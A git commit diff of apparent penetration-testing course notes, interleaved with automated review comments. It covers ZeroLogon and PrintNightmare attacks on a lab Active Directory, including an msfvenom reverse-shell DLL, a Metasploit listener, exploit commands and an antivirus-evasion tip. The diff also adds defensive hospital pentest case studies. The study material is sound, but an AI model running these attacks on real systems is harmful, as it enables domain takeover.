Commit
1 parent aa73b2f, commit 86e9a2e
Showing 4 changed files with 153 additions and 10 deletions.
@@ -1,2 +1,80 @@ | ||
# AD - Additional Attacks | ||
|
||
## ZeroLogon | ||
|
||
➡️ [**ZeroLogon**](https://www.trendmicro.com/en_us/what-is/zerologon.html) is a vulnerability in the cryptography of Microsoft’s Netlogon process that allows an attack against Microsoft Active Directory domain controllers. Zerologon makes it possible for a hacker to impersonate any computer, including the root domain controller. | ||
|
||
The **Zerologon vulnerability (CVE-2020-1472)** is a critical flaw in Microsoft's **Netlogon Remote Protocol (MS-NRPC)** that affects **Active Directory (AD) domain controllers**. Zerologon allows an unauthenticated attacker with network access to a domain controller to establish a vulnerable Netlogon session and eventually gain domain administrator privileges. | ||
|
||
The vulnerability arises from a flaw in the **cryptographic implementation of the Netlogon protocol**, enabling attackers to impersonate any computer, including the root domain controller. By exploiting this, an attacker can effectively take over the entire domain. | ||
|
||
This is a very dangerous attack, not worth the risk of running it in a pentest. | ||
|
||
- [ZeroLogon testing script](https://github.com/SecuraBV/CVE-2020-1472) | ||
|
||
```bash | ||
mkdir -p $HOME/tcm/peh/ad-attacks/zerologon | ||
cd $HOME/tcm/peh/ad-attacks/zerologon | ||
git clone https://github.com/dirkjanm/CVE-2020-1472.git | ||
wget https://raw.githubusercontent.com/SecuraBV/CVE-2020-1472/refs/heads/master/zerologon_tester.py | ||
|
||
python3 zerologon_tester.py hydra-dc 192.168.31.90 | ||
``` | ||
|
||
 | ||
|
||
- Proceed with the attack using [dirkjanm/CVE-2020-1472: PoC for Zerologon](https://github.com/dirkjanm/CVE-2020-1472) if the target is vulnerable. | ||
|
||
--- | ||
|
||
## PrintNightmare | ||
|
||
> - [Playing with PrintNightmare | 0xdf hacks stuff](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) | ||
➡️ The [**PrintNightmare**](https://www.huntress.com/blog/critical-vulnerability-printnightmare-exposes-windows-servers-to-remote-code-execution) vulnerability refers to critical security flaws in the Windows **Print Spooler service**, identified as **CVE-2021-1675** and **CVE-2021-34527**. | ||
|
||
PrintNightmare is a critical **remote code execution** and **local privilege escalation** vulnerability that allows attackers to execute arbitrary code with **SYSTEM** privileges, enabling them to install programs, modify data, or create new accounts with full user rights. **Exploitation can occur remotely or locally**, even on fully patched systems, if certain registry settings are misconfigured. Microsoft has released patches to address these issues, however, systems with specific registry configurations may remain vulnerable. | ||
|
||
```bash | ||
# Impacket | ||
|
||
# Scanning | ||
rpcdump.py @192.168.31.90 | egrep 'MS-RPRN|MS-PAR' | ||
|
||
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol | ||
Protocol: [MS-RPRN]: Print System Remote Protocol | ||
# DC could be vulnerable | ||
|
||
# Attacking | ||
mkdir -p $HOME/tcm/peh/ad-attacks/printnightmare | ||
cd $HOME/tcm/peh/ad-attacks/printnightmare | ||
wget https://raw.githubusercontent.com/cube0x0/CVE-2021-1675/refs/heads/main/CVE-2021-1675.py | ||
|
||
# Open second terminal - Generate dll payload | ||
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.31.131 LPORT=5555 -f dll > shell.dll | ||
msfconfole | ||
use multi/handler | ||
set payload windows/x64/shell_reverse_tcp | ||
set LPORT 5555 | ||
set LHOST 192.168.31.131 | ||
|
||
# Open third terminal - setup a file share | ||
smbserver.py share `pwd` -smb2support | ||
|
||
# Run attack | ||
python3 CVE-2021-1675.py marvel.local/fcastle:[email protected] '\\192.168.31.131\share\shell.dll' | ||
``` | ||
|
||
- The attack was executed on a fully patched **Windows Server 2022**, and if it failed, it is most likely due to the applied security patches. | ||
- The `dll` may need to be obfuscated to bypass AV detection. | ||
|
||
```bash | ||
# CVE-2021-1675.py output | ||
[*] Connecting to ncacn_np:192.168.31.90[\PIPE\spoolss] | ||
[+] Bind OK | ||
[-] Failed to enumerate remote pDriverPath | ||
RPRN SessionError: unknown error code: 0x8001011b | ||
``` | ||
|
||
--- | ||
|
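Review bot: `msfconfole` in the PrintNightmare block is a typo for `msfconsole`, and the handler configured right after it is never started: after `set LHOST 192.168.31.131` there is no `run` (or `exploit -j`) line, so no listener is waiting on port 5555 when `CVE-2021-1675.py` is launched. In the same block the final command's target reads `marvel.local/fcastle:[email protected]`, which looks like an email-address rewrite has swallowed the host; restore the `domain/user:password@host` form, and consider keeping even lab passwords out of a committed file. In the ZeroLogon section, "not worth the risk of running it in a pentest" should say what the PoC changes on the domain controller and how that change is reverted, since the reader is otherwise pointed at the exploit repository without knowing what it breaks. Minor: prefer `grep -E` over `egrep`; the `> - [Playing with PrintNightmare ...]` blockquote is followed by the "➡️ The PrintNightmare" paragraph with no blank line between them, so Markdown renders that paragraph as a lazy continuation of the quote; and "and if it failed, it is most likely due to the applied security patches" reads better as "and it failed, most likely because of the applied security patches".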
@@ -1 +1,62 @@ | ||
# AD - Case Studies | ||
# AD - Case Studies | ||
|
||
## Case study #1 | ||
|
||
> - [AD Case Study #1 - You Spent How Much on Security? - TCM Security](https://tcm-sec.com/pentest-tales-001-you-spent-how-much-on-security/) | ||
|
||
This case study details a **penetration test** conducted on a **well-funded U.S. hospital** with a strong security infrastructure, including **IDS/IPS, CyberArk PAM, Symantec Endpoint Security, and proper patch management**. Despite these defenses, testers found **critical security gaps** that could be exploited. | ||
|
||
**Key Findings:** | ||
|
||
- **SMB Relay Attack Exposure:** | ||
- LLMNR/NBNS poisoning was **mitigated**, but **SMB relay attacks** were still possible | ||
- Attackers could use **NTLM relaying** to escalate privileges | ||
- **Privilege Escalation Risks:** | ||
- Misconfigurations and local users easy-reused hashes/passwords allowed **privilege escalation**, leading to potential **Domain Admin access** | ||
- Weak **Active Directory hardening** left **high-value targets exposed** | ||
- **Security Investment ≠ Full Protection:** | ||
- Even with expensive security solutions, **configuration weaknesses** left the network vulnerable | ||
- **Lateral movement & persistence techniques** were viable due to **improper segmentation** and **overprivileged accounts** | ||
|
||
**Key Takeaways:** | ||
|
||
- **Network segmentation & NTLM hardening** are critical | ||
- **Regular security assessments** are needed despite high investment in security tools | ||
- **Least privilege enforcement** should be a priority to prevent escalation | ||
|
||
This case study highlights how **misconfigurations and overlooked weaknesses** can lead to **serious security risks**, even in well-funded environments. | ||
|
||
--- | ||
|
||
## Case study #2 | ||
|
||
> - [AD Case Study #2 - #Pentest Tales #002: Digging Deep - TCM Security](https://tcm-sec.com/pentest-tales-002-digging-deep) | ||
|
||
This case study outlines a **penetration test** on a **well-funded U.S. hospital** with solid security measures, including **LLMNR/IPv6 disabled, SMB Signing enforced, IDS/IPS, and patched systems**. Despite these controls, the assessment revealed **critical security gaps** that could be exploited. | ||
|
||
**Key Findings:** | ||
|
||
- **Default Credentials on Development Apps:** | ||
- A **development environment application** was found using **default credentials**, granting unauthorized access. | ||
- Attackers could **leverage this access** to extract **sensitive information**. | ||
- **Local Administrator Password Reuse:** | ||
- The **same local admin password** was used across multiple machines. | ||
- Once a **single system** was compromised, **lateral movement** became trivial. | ||
- **WDigest Enabled on Legacy Systems:** | ||
- Older systems had **WDigest enabled**, storing **plaintext credentials** in memory. | ||
- Attackers could extract **Domain Admin credentials** using tools like **Mimikatz**. | ||
- **Overprivileged Service Accounts:** | ||
- Service accounts had **Domain Admin** privileges unnecessarily. | ||
- Compromising one of these accounts **led to full domain compromise**. | ||
|
||
**Key Takeaways:** | ||
|
||
- **Enforce unique local admin passwords** across endpoints (**LAPS**). | ||
- **Disable WDigest** on all systems to prevent plaintext credential exposure. | ||
- **Restrict service account privileges** to the **minimum necessary**. | ||
- **Regular security assessments** are necessary, even with strong security investments. | ||
|
||
This case highlights how **misconfigurations and weak credential management** can undermine otherwise strong defenses, making **lateral movement and domain compromise easy** for attackers. | ||
|
||
--- | ||
|
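Review bot: the bullet "Misconfigurations and local users easy-reused hashes/passwords allowed privilege escalation" is ungrammatical; suggest "Misconfigurations and reused local-user passwords/hashes allowed privilege escalation". The `# AD - Case Studies` heading appears twice at the top of the hunk; if the original line is removed and re-added only for a line-ending change that is fine, but check that the committed file does not end up with a duplicated H1. Case study #2 reuses #1's opening sentence almost verbatim ("well-funded U.S. hospital"); confirm that description actually applies to the #002 engagement rather than being a copy-paste. Style: the bullets in #1 carry no terminal periods while those in #2 do, and the #1 takeaway "NTLM hardening" would tie back to the SMB relay finding more clearly if it named the specific control, as #2 already does with "SMB Signing enforced".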